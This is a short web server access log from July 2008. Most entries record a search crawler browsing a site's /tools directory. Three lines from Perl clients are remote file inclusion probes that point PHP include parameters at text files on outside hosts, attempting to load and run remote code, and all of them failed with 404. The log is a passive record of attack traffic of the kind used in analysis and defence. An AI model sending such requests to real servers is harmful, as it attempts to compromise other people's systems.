190.196.2.205 - - [29/Jul/2008:09:56:10 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.74.10.235 - - [29/Jul/2008:09:56:11 -0700] "GET /tools?N=D HTTP/1.1" 301 94 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.1; http://www.majestic12.co.uk/bot.php?+)" "www.dmulk.com"
65.98.70.18 - - [29/Jul/2008:09:56:11 -0700] "GET /logs/access_080218.log//modules/TotalCalendar/about.php?inc_dir=http://moisidis.gr/siteframe/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.74.10.235 - - [29/Jul/2008:09:56:11 -0700] "GET /tools/?N=D HTTP/1.1" 200 12404 "http://www.dmulk.com/tools?N=D" "Mozilla/5.0 (compatible; MJ12bot/v1.2.1; http://www.majestic12.co.uk/bot.php?+)" "www.dmulk.com"
190.196.2.205 - - [29/Jul/2008:09:56:12 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.74.10.235 - - [29/Jul/2008:09:56:14 -0700] "GET /tools?S=A HTTP/1.1" 301 94 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.1; http://www.majestic12.co.uk/bot.php?+)" "www.dmulk.com"
206.74.10.235 - - [29/Jul/2008:09:56:14 -0700] "GET /tools/?S=A HTTP/1.1" 200 12404 "http://www.dmulk.com/tools?S=A" "Mozilla/5.0 (compatible; MJ12bot/v1.2.1; http://www.majestic12.co.uk/bot.php?+)" "www.dmulk.com"
206.74.10.235 - - [29/Jul/2008:09:56:16 -0700] "GET /webcam HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.1; http://www.majestic12.co.uk/bot.php?+)" "www.dmulk.com"
